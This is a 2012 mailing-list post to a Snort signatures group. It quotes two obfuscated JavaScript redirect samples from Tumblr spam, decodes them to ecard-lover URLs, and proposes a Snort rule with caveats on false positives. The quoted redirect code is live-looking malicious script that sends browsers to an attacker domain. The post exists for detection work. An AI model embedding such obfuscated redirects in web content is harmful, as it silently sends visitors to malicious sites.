[Snort-sigs] Tumblr redirect update

James Lay jlay at ...3266...
Fri Jul 6 11:30:12 EDT 2012


Team,

The attackers have added another variant of this redirect. For comparison, the 
previous version was:
// Obfuscated redirect, quoted as-is for signature development -- do not run.
// Every helper (vfti, izhm, rgjdww, wlwq, zmkh) just returns its two arguments
// concatenated, so the string fragments reassemble, left to right, into
//   'http://e' + 'card5-l' + 'over.c' + 'om/?EUKM' + 'lNOR'
//   = http://ecard5-lover.com/?EUKMlNOR
// and the final assignment to document.location navigates the browser there.
// Detection note: the literal ='http' (which contains "='htt") and the separate
// '://e' fragment are the bytes a content match can key on in this variant.
var yvkq='http'; var gql='://e'; function vfti(hzo,dpq){return hzo+dpq} 
var ojty=vfti(yvkq,gql);var ujh='card'; var rgl='5-l'; function 
izhm(nac,rww){return nac+rww} var imqv=izhm(ujh,rgl);var fyy='ove'; var 
qptv='r.c'; function rgjdww(zsb,uqi){return zsb+uqi} var 
eavjam=rgjdww(fyy,qptv);var uqv='om/?'; var cew='EUKM'; function 
wlwq(vzm,deb){return vzm+deb} var uelj=wlwq(uqv,cew);var cozw='lNO'; var 
gpp='R'; function zmkh(vkj,mov){return vkj+mov} var peqo=zmkh(cozw,gpp); 
var bzsd=ojty+imqv+eavjam+uelj+peqo; document.location = bzsd
// bzsd === 'http://ecard5-lover.com/?EUKMlNOR' at this point.

and the new version:
// Newer variant of the same redirect, quoted as-is for signature development -- do not run.
// Same construction: relz, eettgr and sccfhz return their two arguments joined,
// frmy joins three. The fragments reassemble into
//   'http://' + 'ecard3-' + 'lover.co' + 'm/?5MzoGyEy'
//   = http://ecard3-lover.com/?5MzoGyEy
// and document.location is assigned the result.
// Detection note: the scheme is now split as 'htt' + 'p://', so "='http" no
// longer appears contiguously; "='htt" followed by a quote still does.
var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} 
var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function 
eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var 
xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} 
var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var 
zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var 
qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; 
document.location = otoa
// otoa === 'http://ecard3-lover.com/?5MzoGyEy' at this point.

The Snort signature below should match both the previous method and the new one:
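# WEB-CLIENT Tumblr spam redirect -- intended to match both quoted variants.
# Keys on a string literal opening with "='htt" followed, within 15 bytes of the
# end of that match, by "://", inside the decoded HTTP response body (file_data),
# so it covers both the 'http' + '://e' split and the 'htt' + 'p://' split.
# Caveats before deploying with the drop policy:
#  - A plain URL literal such as var u='http://...' also satisfies the pair
#    (the "://" sits one byte after "='htt"), so inline-block mode will hit
#    legitimate scripts. A tighter form would require the closing quote right
#    after the fragment, e.g. content:"'"; within:2; before the "://" check --
#    validate any such change against a pcap of both samples first.
#  - In the quoted samples 13-14 bytes separate the two contents; within:15 is
#    tight, and list wrapping may have altered the spacing, so confirm with a pcap.
# Syntax fixes relative to the posted text: the reference keyword takes a system
# id ("url,"), which was missing; the rule is on one line; established added to flow.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT Tumblr spam redirect"; flow:from_server,established; file_data; content:"='htt"; content:"://"; within:15; metadata:policy security-ips drop, service http; reference:url,malwareandmore.blogspot.com/2012/06/tumblr-redirects.html; classtype:bad-unknown; sid:XXXXXXX; rev:2;)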

Thank you.

James



